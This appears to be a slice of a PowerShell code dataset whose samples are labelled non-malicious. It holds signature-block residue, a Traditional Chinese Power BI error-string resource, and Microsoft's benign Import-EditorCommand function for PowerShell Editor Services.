NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1MjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAjJOfLZb3ivip # L3sSLlWFbLrWjmSggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJ6QUwIhgPMjAyNDEwMjgxMDQyMTNaGA8yMDI0 # MTAyOTEwNDIxM1owdzA9BgorBgEEAYRZCgQBMS8wLTAKAgUA6snpBQIBADAKAgEA # AgIa1wIB/zAHAgEAAgITPjAKAgUA6ss6hQIBADA2BgorBgEEAYRZCgQCMSgwJjAM # BgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEB # CwUAA4IBAQAb6NwhJU6AqC9y7uh2hreA2bMAlUuzSXcR6GPun/rHgrgfQTe4RBRr # /jfnUT+KQlJtxfDU/IHDXlRFv0FVU5U7cety3IMK0/IZ1ahLcCNSLoMvMnyiTjO3 # qKyN4MEFl3yXKar4dOwpuXIc6RDKvk90wK2dB5N/J0xbq7DWoizimYbYj0s0Eb/3 # 9OIVKvzQ2C32cLh8WRrg+s29DIGtm6yPrp1YUMXeXEBzc765thUReieMSIXpuMhk # wVuch5mEOYFv2ftoL3lD4CGRFEwUHwwt1rgfRwyWQ+pn3ZXRAA+1v5iEzjN81+VP # 8zAakq6wB0hFJ6xpVsYTxo1Q4u6bJqYJMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAIAC9eqfxsqF1YAAQAAAgAwDQYJYIZI # AWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG # 9w0BCQQxIgQgXibd178PQ39cDFDQFc3/JkZbrIW/LtewC2SMKi0qQqswgfoGCyqG # SIb3DQEJEAIvMYHqMIHnMIHkMIG9BCDUyO3sNZ3burBNDGUCV4NfM2gH4aWuRudI # k/9KAk/ZJzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n # dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y # YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMz # AAACAAvXqn8bKhdWAAEAAAIAMCIEIL1IrqDou+p7PvcuEWcaTRFbuM53lAEMQcad # RIs4/Ph4MA0GCSqGSIb3DQEBCwUABIICAJ2fDXf4sqoS/mbeHeoVH0x19jGwTzAs # 2jlgDIfA7k0MqDyzJC24VLXKGSJd0oCYJT86N1R51C1gHkYxXmIUQbycJ5y0lE0Q # Vfqlu6gjrbD/wZJ+X/uQxE3wzD5iCDikCpT/GhGgXFimJu6LtziBreqyxwbfwX2K # KtgQOm8zTUNs4cgtBTVycDvdzPGj+72/bDbNAKPPYQWA2RlWJEexo/qvI8kvSQgu # kvg9YLDc8kudJ0Mi6819gYtqNIG0jnluJ4lLNUqrnlIi3PGkuvSii9JfCRAK4Fjf # LB51pggJrpJyuJCB5buVUZqt7xeEvCLUb5fGqSodSgZHPp5Wfqb37HVjroXR133r # Geaai9b7o8myK7dc8cC/j0Njtfh8ryHoDSqjo7zC+RoKoYh+xAlbko2HE61DoQuu # NvSe2N38Pm+eKSIHtyCGGBbpdVOIQu+5tb2I1vUgQWScroBE3FqW3HEwVNB8ys1I # 2wJw/iwv3F1Ym8X/s+Q9RHVRx2vGubTZVkCgbEEe+1qjeG8L7QUecY+skdah+Ba4 # bfYIInorpx9tMoiCSuxiEbc9eP+BLvmotLcQ4bVlvwXcwrQAsPOBtWUh0KdZE15p # B+MdAWhnLZvkHuk2HcilHLW7sk6sHKktUq0f9WVI2aDpd0OAvvRVD6mNYw6Rq45I # LEKlqkOHt87r # SIG # End signature block
combined_dataset/train/non-malicious/sample_49_63.ps1
sample_49_63.ps1
!無法建立連線: 快取的認證已過期或密碼已更新。請重新輸入您的認證。#嘗試探索 PowerBI 環境時無法連線至 '%{strURL/}'。因為回應格式錯誤,所以 Power BI 後端端點搜尋失敗。無法呼叫 CertGetNameStringW。 無法驗證憑證鏈結。#指紋為 '%{strThumbprint/}' 的憑證簽發者不受信任。K此伺服器執行個體已在沒有設定安全通道憑證 (ServerSchannelTokenSignerCert) 的情況下啟動,不允許在執行階段期間設定憑證。C此伺服器執行個體已在有設定安全通道憑證 (ServerSchannelTokenSignerCert) 的情況下啟動,不允許將其清除。只允許伺服器管理員更改伺服器安全通道憑證。*DISCOVER_MODEL_SECURITY 僅於 Power BI 服務中支援。,只有內部 Power BI 連線才支援 DISCOVER_MODEL_SECURITY。!您的權限不足,無法查詢資料集。如需進一步協助,請聯繫資料集擁有者。ž無法使用 EffectiveUserName 屬性,因為您已連線到是傳統工作區,或您不是工作區系統管理員。請連絡工作區的現有系統管理員,授權您所需的權限,或將資料集移到您是工作區系統管理員的工作區。如需詳細資訊,請參閱 https://go.microsoft.com/fwlink/?linkid=2171972。1使用者 '%{euii_strUser/}' 無權匯出資料庫 '%{strDatabase/}'。
combined_dataset/train/non-malicious/sample_18_55.ps1
sample_18_55.ps1
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. function Import-EditorCommand { <# .EXTERNALHELP ..\PowerShellEditorServices.Commands-help.xml #> [OutputType([Microsoft.PowerShell.EditorServices.Extensions.EditorCommand, Microsoft.PowerShell.EditorServices])] [CmdletBinding(DefaultParameterSetName='ByCommand')] param( [Parameter(Position=0, Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName, ParameterSetName='ByCommand')] [ValidateNotNullOrEmpty()] [string[]] $Command, [Parameter(Position=0, Mandatory, ParameterSetName='ByModule')] [ValidateNotNullOrEmpty()] [string[]] $Module, [switch] $Force, [switch] $PassThru ) begin { function GetCommandsFromModule { param( [Parameter(ValueFromPipeline)] [string] $ModuleToSearch ) process { if (-not $ModuleToSearch) { return } $caller = (Get-PSCallStack)[2] if ($caller.InvocationInfo.MyCommand.ScriptBlock.Module.Name -eq $ModuleToSearch) { $moduleInfo = $caller.InvocationInfo.MyCommand.ScriptBlock.Module return $moduleInfo.Invoke( { $ExecutionContext.SessionState.InvokeProvider.Item.Get('function:\*') | Where-Object ModuleName -eq $args[0] }, $ModuleToSearch) } $moduleInfo = Get-Module $ModuleToSearch -ErrorAction SilentlyContinue return $moduleInfo.ExportedFunctions.Values } } $editorCommands = @{} foreach ($existingCommand in $psEditor.GetCommands()) { $editorCommands[$existingCommand.Name] = $existingCommand } } process { switch ($PSCmdlet.ParameterSetName) { ByModule { $commands = $Module | GetCommandsFromModule } ByCommand { $commands = $Command | Get-Command -ErrorAction SilentlyContinue } } $attributeType = [Microsoft.PowerShell.EditorServices.Extensions.EditorCommandAttribute, Microsoft.PowerShell.EditorServices] foreach ($aCommand in $commands) { # Get the attribute from our command to get name info. $details = $aCommand.ScriptBlock.Attributes | Where-Object TypeId -eq $attributeType if ($details) { # TODO: Add module name to this? # Name: Expand-Expression becomes ExpandExpression if (-not $details.Name) { $details.Name = $aCommand.Name -replace '-' } # DisplayName: Expand-Expression becomes Expand Expression if (-not $details.DisplayName) { $details.DisplayName = $aCommand.Name -replace '-', ' ' } # If the editor command is already loaded skip unless force is specified. if ($editorCommands.ContainsKey($details.Name)) { if ($Force.IsPresent) { $null = $psEditor.UnregisterCommand($details.Name) } else { $PSCmdlet.WriteVerbose($Strings.EditorCommandExists -f $details.Name) continue } } # Check for a context parameter. $contextParameter = $aCommand.Parameters.Values | Where-Object ParameterType -eq ([Microsoft.PowerShell.EditorServices.Extensions.EditorContext, Microsoft.PowerShell.EditorServices]) # If one is found then add a named argument. Otherwise call the command directly. if ($contextParameter) { $sbText = '{0} -{1} $args[0]' -f $aCommand.Name, $contextParameter.Name $scriptBlock = [scriptblock]::Create($sbText) } else { $scriptBlock = [scriptblock]::Create($aCommand.Name) } $editorCommand = [Microsoft.PowerShell.EditorServices.Extensions.EditorCommand, Microsoft.PowerShell.EditorServices]::new( <# commandName: #> $details.Name, <# displayName: #> $details.DisplayName, <# suppressOutput: #> $details.SuppressOutput, <# scriptBlock: #> $scriptBlock) $PSCmdlet.WriteVerbose($Strings.EditorCommandImporting -f $details.Name) $null = $psEditor.RegisterCommand($editorCommand) if ($PassThru.IsPresent -and $editorCommand) { $editorCommand # yield } } } } } if ($PSVersionTable.PSVersion.Major -ge 5) { Register-ArgumentCompleter -CommandName Import-EditorCommand -ParameterName Module -ScriptBlock { param($commandName, $parameterName, $wordToComplete, $commandAst, $fakeBoundParameters) (Get-Module).Name -like ($wordToComplete + '*') | ForEach-Object { [System.Management.Automation.CompletionResult]::new($PSItem, $PSItem, 'ParameterValue', $PSItem) } } Register-ArgumentCompleter -CommandName Import-EditorCommand -ParameterName Command -ScriptBlock { param($commandName, $parameterName, $wordToComplete, $commandAst, $fakeBoundParameters) (Get-Command -ListImported).Name -like ($wordToComplete + '*') | ForEach-Object { [System.Management.Automation.CompletionResult]::new($PSItem, $PSItem, 'ParameterValue', $PSItem) } } } # SIG # Begin signature block # MIIr5AYJKoZIhvcNAQcCoIIr1TCCK9ECAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBCo/8RxkJRpjfH # tv88INxNRrHwrLnOrzrSY5Y80TZvAqCCEW4wggh+MIIHZqADAgECAhM2AAAB33OB # lxa+Mv0NAAIAAAHfMA0GCSqGSIb3DQEBCwUAMEExEzARBgoJkiaJk/IsZAEZFgNH # QkwxEzARBgoJkiaJk/IsZAEZFgNBTUUxFTATBgNVBAMTDEFNRSBDUyBDQSAwMTAe # Fw0yNDAxMjAwMTMzNDRaFw0yNTAxMTkwMTMzNDRaMCQxIjAgBgNVBAMTGU1pY3Jv # c29mdCBBenVyZSBDb2RlIFNpZ24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK # AoIBAQDVucAmkbIWpspYysyydQyyRh2L8q5igYFcy2vDk8xGvVMRBhxwbOsJIEd0 # wY8N7WU/xgkYMnSsM4vmc2B49DGdrAjSJqbsx0zf+DLFjrBITUecdRhlq0VKGX8U # bVOkg0aIfFNLRs4DSrCZYh26zyB8qkL/jUmB7DhcBEhhgOlXRQ4LHnUv7qf+iXqD # uwFz9tUTAh8JGsgLRBK0oSsRfUB+FJF2KyUxzmeFXJKiEynsWz4kqoM91ag1Yw0U # 8d0e+RgAKi3Ft1cXA+3qKM6I1H11e/NdIjh7oThvrBtfEngwlwbTF3KZOHdhLBFZ # 18U4v8VeTlb4r94346CY2+SKnQa7AgMBAAGjggWKMIIFhjApBgkrBgEEAYI3FQoE # HDAaMAwGCisGAQQBgjdbAQEwCgYIKwYBBQUHAwMwPQYJKwYBBAGCNxUHBDAwLgYm # KwYBBAGCNxUIhpDjDYTVtHiE8Ys+hZvdFs6dEoFgg93NZoaUjDICAWQCAQ4wggJ2 # BggrBgEFBQcBAQSCAmgwggJkMGIGCCsGAQUFBzAChlZodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpaW5mcmEvQ2VydHMvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1F # JTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBSBggrBgEFBQcwAoZGaHR0cDovL2NybDEu # YW1lLmdibC9haWEvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUy # MDAxKDIpLmNydDBSBggrBgEFBQcwAoZGaHR0cDovL2NybDIuYW1lLmdibC9haWEv # QlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBS # BggrBgEFBQcwAoZGaHR0cDovL2NybDMuYW1lLmdibC9haWEvQlkyUEtJQ1NDQTAx # LkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBSBggrBgEFBQcwAoZG # aHR0cDovL2NybDQuYW1lLmdibC9haWEvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1F # JTIwQ1MlMjBDQSUyMDAxKDIpLmNydDCBrQYIKwYBBQUHMAKGgaBsZGFwOi8vL0NO # PUFNRSUyMENTJTIwQ0ElMjAwMSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2Vy # dmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1BTUUsREM9R0JM # P2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0 # aG9yaXR5MB0GA1UdDgQWBBSO7i0qme7tjtjFjyuIjlmGM6cbCTAOBgNVHQ8BAf8E # BAMCB4AwRQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEWMBQGA1UEBRMNMjM2MTY3KzUwMTk3MDCCAeYGA1UdHwSCAd0wggHZMIIB # 1aCCAdGgggHNhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpaW5mcmEvQ1JM # L0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwxLmFtZS5nYmwv # Y3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwyLmFtZS5n # YmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwzLmFt # ZS5nYmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmw0 # LmFtZS5nYmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGgb1sZGFwOi8v # L0NOPUFNRSUyMENTJTIwQ0ElMjAwMSgyKSxDTj1CWTJQS0lDU0NBMDEsQ049Q0RQ # LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp # Z3VyYXRpb24sREM9QU1FLERDPUdCTD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0 # P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwHwYDVR0jBBgw # FoAUllGE4Gtve/7YBqvD8oXmKa5q+dQwHwYDVR0lBBgwFgYKKwYBBAGCN1sBAQYI # KwYBBQUHAwMwDQYJKoZIhvcNAQELBQADggEBAJe/YXNSCoXitLf/X5pfJZpep3cs # jdqmBgg+8Kr++8XMjWwdm4tiLasJMUPCgmp5NYn3wC4GefGYwfF7Xm2FMSR2i6QU # HjigGu6BjdWQh4EwGaNqXLkXlUM7Ww2Z0KrRtpCL16DCOTNZuCFPAytSHFskPWrr # 6q3EBuiM6P5VLgFSKiAxcunldJorbrBrvZSZib1OINzFGAQszUR0ytovW6FOp+uo # VhiQCqnOheC1ppnZPss7vnXoogyO0xgSW40bRlltGfwnlOd3IZ/43ZOj5XeeShg5 # 2SzVEiyYrZjD17MSNzQM1JKI07+mtAC7D+eZ/+g2pM/91oHcrDq9Nq4QrS0wggjo # MIIG0KADAgECAhMfAAAAUeqP9pxzDKg7AAAAAABRMA0GCSqGSIb3DQEBCwUAMDwx # EzARBgoJkiaJk/IsZAEZFgNHQkwxEzARBgoJkiaJk/IsZAEZFgNBTUUxEDAOBgNV # BAMTB2FtZXJvb3QwHhcNMjEwNTIxMTg0NDE0WhcNMjYwNTIxMTg1NDE0WjBBMRMw # EQYKCZImiZPyLGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUwEwYDVQQD # EwxBTUUgQ1MgQ0EgMDEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJ # mlIJfQGejVbXKpcyFPoFSUllalrinfEV6JMc7i+bZDoL9rNHnHDGfJgeuRIYO1LY # /1f4oMTrhXbSaYRCS5vGc8145WcTZG908bGDCWr4GFLc411WxA+Pv2rteAcz0eHM # H36qTQ8L0o3XOb2n+x7KJFLokXV1s6pF/WlSXsUBXGaCIIWBXyEchv+sM9eKDsUO # LdLTITHYJQNWkiryMSEbxqdQUTVZjEz6eLRLkofDAo8pXirIYOgM770CYOiZrcKH # K7lYOVblx22pdNawY8Te6a2dfoCaWV1QUuazg5VHiC4p/6fksgEILptOKhx9c+ia # piNhMrHsAYx9pUtppeaFAgMBAAGjggTcMIIE2DASBgkrBgEEAYI3FQEEBQIDAgAC # MCMGCSsGAQQBgjcVAgQWBBQSaCRCIUfL1Gu+Mc8gpMALI38/RzAdBgNVHQ4EFgQU # llGE4Gtve/7YBqvD8oXmKa5q+dQwggEEBgNVHSUEgfwwgfkGBysGAQUCAwUGCCsG # AQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNxQCAQYJKwYBBAGCNxUGBgorBgEEAYI3 # CgMMBgkrBgEEAYI3FQYGCCsGAQUFBwMJBggrBgEFBQgCAgYKKwYBBAGCN0ABAQYL # KwYBBAGCNwoDBAEGCisGAQQBgjcKAwQGCSsGAQQBgjcVBQYKKwYBBAGCNxQCAgYK # KwYBBAGCNxQCAwYIKwYBBQUHAwMGCisGAQQBgjdbAQEGCisGAQQBgjdbAgEGCisG # AQQBgjdbAwEGCisGAQQBgjdbBQEGCisGAQQBgjdbBAEGCisGAQQBgjdbBAIwGQYJ # KwYBBAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMBIGA1UdEwEB/wQI # MAYBAf8CAQAwHwYDVR0jBBgwFoAUKV5RXmSuNLnrrJwNp4x1AdEJCygwggFoBgNV # HR8EggFfMIIBWzCCAVegggFToIIBT4YxaHR0cDovL2NybC5taWNyb3NvZnQuY29t # L3BraWluZnJhL2NybC9hbWVyb290LmNybIYjaHR0cDovL2NybDIuYW1lLmdibC9j # cmwvYW1lcm9vdC5jcmyGI2h0dHA6Ly9jcmwzLmFtZS5nYmwvY3JsL2FtZXJvb3Qu # Y3JshiNodHRwOi8vY3JsMS5hbWUuZ2JsL2NybC9hbWVyb290LmNybIaBqmxkYXA6 # Ly8vQ049YW1lcm9vdCxDTj1BTUVSb290LENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl # MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPUFNRSxE # Qz1HQkw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNz # PWNSTERpc3RyaWJ1dGlvblBvaW50MIIBqwYIKwYBBQUHAQEEggGdMIIBmTBHBggr # BgEFBQcwAoY7aHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraWluZnJhL2NlcnRz # L0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUHMAKGK2h0dHA6Ly9jcmwyLmFt # ZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUHMAKGK2h0dHA6 # Ly9jcmwzLmFtZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUH # MAKGK2h0dHA6Ly9jcmwxLmFtZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQw # gaIGCCsGAQUFBzAChoGVbGRhcDovLy9DTj1hbWVyb290LENOPUFJQSxDTj1QdWJs # aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u # LERDPUFNRSxEQz1HQkw/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNl # cnRpZmljYXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggIBAFAQI7dPD+jf # XtGt3vJp2pyzA/HUu8hjKaRpM3opya5G3ocprRd7vdTHb8BDfRN+AD0YEmeDB5HK # QoG6xHPI5TXuIi5sm/LeADbV3C2q0HQOygS/VT+m1W7a/752hMIn+L4ZuyxVeSBp # fwf7oQ4YSZPh6+ngZvBHgfBaVz4O9/wcfw91QDZnTgK9zAh9yRKKls2bziPEnxeO # ZMVNaxyV0v152PY2xjqIafIkUjK6vY9LtVFjJXenVUAmn3WCPWNFC1YTIIHw/mD2 # cTfPy7QA1pT+GPARAKt0bKtq9aCd/Ym0b5tPbpgCiRtzyb7fbNS1dE740re0COE6 # 7YV2wbeo2sXixzvLftH8L7s9xv9wV+G22qyKt6lmKLjFK1yMw4Ni5fMabcgmzRvS # jAcbqgp3tk4a8emaaH0rz8MuuIP+yrxtREPXSqL/C5bzMzsikuDW9xH10graZzSm # PjilzpRfRdu20/9UQmC7eVPZ4j1WNa1oqPHfzET3ChIzJ6Q9G3NPCB+7KwX0OQmK # yv7IDimj8U/GlsHD1z+EF/fYMf8YXG15LamaOAohsw/ywO6SYSreVW+5Y0mzJutn # BC9Cm9ozj1+/4kqksrlhZgR/CSxhFH3BTweH8gP2FEISRtShDZbuYymynY1un+Ry # fiK9+iVTLdD1h/SxyxDpZMtimb4CgJQlMYIZzDCCGcgCAQEwWDBBMRMwEQYKCZIm # iZPyLGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUwEwYDVQQDEwxBTUUg # Q1MgQ0EgMDECEzYAAAHfc4GXFr4y/Q0AAgAAAd8wDQYJYIZIAWUDBAIBBQCgga4w # GQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisG # AQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIPZ8NEzZjgCyML6sujLTPgimQGyG4V5q # vxM+l9MjZcEpMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYA # dKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEA # sOIzMryT05hidvniyEq+tEyVAtwhHLHUry9Gye7D1eMCqWGRPFcNiTJsufmSUPLw # +cXgdhc7Xby0AhiOpetoQn059+lgVWsuYBPNGMB8z1wSAFdts62a+BkPn4KmJeBH # S9MA+WL5VOOOIBKMrPLUM4lQR6leW6Ojy2dn03skNgAqV0Ut886iAQUHyMp4OaMM # vdrViSer67K2vQXCwQCF6u/cOyeVHQGp/jxa9ujDWAzDoXA/2JRoHwhO85U2yr3f # HwgmCgdNUh6pKUwGyvdRlANg/n0OwAp20PlMqitl6X9+nFVv+2JmLru3iC9KSLvT # VncekChbcAkuHcePpLz/kqGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCCF3wGCSqG # SIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsqhkiG9w0B # CRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUA # BCDdo/yed668mJKWGrypazQYb2vfCKMeLGMeSgxadd0o6gIGZfLh3QbuGBMyMDI0 # MDQwMzIxMzMzOS41NDlaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJVUzETMBEG # A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj # cm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBP # cGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0wNUUwLUQ5 # NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghHqMIIH # IDCCBQigAwIBAgITMwAAAezgK6SC0JFSgAABAAAB7DANBgkqhkiG9w0BAQsFADB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1MzhaFw0y # NTAzMDUxODQ1MzhaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv # bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 # aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYD # VQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1p # Y3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4IC # DwAwggIKAoICAQCwR/RuCTbgxUWVm/Vdul22uwdEZm0IoAFs6oIr39VK/ItP80cn # +8TmtP67iabB4DmAKJ9GH6dJGhEPJpY4vTKRSOwrRNxVIKoPPeUF3f4VyHEco/u1 # QUadlwD132NuZCxbnh6Mi2lLG7pDvszZqMG7S3MCi2bk2nvtGKdeAIL+H77gL4r0 # 1TSWb7rsE2Jb1P/N6Y/W1CqDi1/Ib3/zRqWXt4zxvdIGcPjS4ZKyQEF3SEZAq4XI # jiyowPHaqNbZxdf2kWO/ajdfTU85t934CXAinb0o+uQ9KtaKNLVVcNf5QpS4f6/M # sXOvIFuCYMRdKDjpmvowAeL+1j27bCxCBpDQHrWkfPzZp/X+bt9C7E5hPP6HVRoq # BYR7u1gUf5GEq+5r1HA0jajn0Q6OvfYckE0HdOv6KWa+sAmJG7PDvTZae77homzx # 6IPqggVpNZuCk79SfVmnKu9F58UAnU58TqDHEzGsQnMUQKstS3zjn6SU0NLEFNCe # tluaKkqWDRVLEWbu329IEh3tqXPXfy6Rh/wCbwe9SCJIoqtBexBrPyQYA2Xaz1fK # 9ysTsx0kA9V1JwVV44Ia9c+MwtAR6sqKdAgRo/bs/Xu8gua8LDe6KWyu974e9mGW # 7ZO8narDFrAT1EXGHDueygSKvv2K7wB8lAgMGJj73CQvr+jqoWwx6XdyeQIDAQAB # o4IBSTCCAUUwHQYDVR0OBBYEFPRa0Edk/iv1whYQsV8UgEf4TIWGMB8GA1UdIwQY # MBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUt # U3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYB # BQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj # cm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB # /wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0G # CSqGSIb3DQEBCwUAA4ICAQCSvMSkMSrvjlDPag8ARb0OFrAQtSLMDpN0UY3FjvPh # wGKDrrixmnuMfjrmVjRq1u8IhkDvGF/bffbFTr+IAnDSeg8TB9zfG/4ybknuopkl # beGjbt7MLxpfholCERyEc20PMZKJz9SvzfuO1n5xrrLOL8m0nmv5kBcv+y1AXJ5Q # cLicmhe2Ip3/D67Ed6oPqQI03mDjYaS1NQhBNtu57wPKXZ1EoNToBk8bA6839w11 # 9b+a9WToqIskdRGoP5xjDIv+mc0vBHhZGkJVvfIhm4Ap8zptC7xVAly0jeOv5dUG # MCYgZjvoTmgd45bqAwundmPlGur7eleWYedLQf7s3L5+qfaY/xEh/9uo17SnM/gH # 